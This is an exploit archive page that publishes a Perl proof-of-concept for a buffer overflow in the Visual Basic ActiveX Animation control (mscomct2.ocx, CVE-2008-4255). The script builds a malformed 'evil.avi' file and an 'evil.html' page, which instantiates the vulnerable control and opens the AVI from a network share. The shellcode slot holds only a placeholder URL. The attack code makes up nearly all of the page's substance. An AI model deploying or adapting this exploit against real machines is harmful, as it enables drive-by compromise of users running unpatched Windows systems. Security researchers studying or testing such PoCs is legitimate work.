exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Visual Basic ActiveX Buffer Overflow

Microsoft Visual Basic ActiveX Buffer Overflow
Posted Dec 12, 2008
Authored by Jerome Athias

Microsoft Visual Basic Active-X Controls buffer overflow proof of concept exploit that leverages mscomct2.ocx.

tags | exploit, overflow, activex, proof of concept
SHA-256 | 9e908a95caf95ef805674d900baaa9e609f55f84e306674f7900dde2246a3c2a

Microsoft Visual Basic ActiveX Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC
# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx
# /JA
# Come to FRHACK!
# www.frhack.org

print "\nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC\n";
print "Generating malicious .AVI file\n";
print "This file should be served via an UNC path\n";
print "[->] Building evil.avi\n";

my $shellcode = "http://metasploit.com";

$FileHeader =
"\x52\x49\x46\x46\x2C\x08\x00\x00\x41\x56\x49\x20\x73\x74\x72\x68\x10\x00\x00\x00\x76\x69\x64\x73\x20\x20\x20\x20\x00\x00\x00\x00".
"\x00\x00\x00\x00\x73\x74\x72\x66\x00\x08\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

open(my $poc, "> evil.avi");
print $poc $FileHeader;
close($poc);

print "[->] evil.avi generated\n";
print "[->] Building evil.html\n";

$EvilHTML =
"<html><head></head><body><object id='evil' classid='clsid:B09DE715-87C1-11D1-8BE3-0000F8754DA1'><param name='AutoPlay' value='True'></object>".
"<script language=javascript>evil.Open('\\\\192.168.0.1\\share\\evil.avi');</script></body></html>";

open(my $poc, "> evil.html");
print $poc $EvilHTML;
close($poc);

print "[->] evil.html generated\n";


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close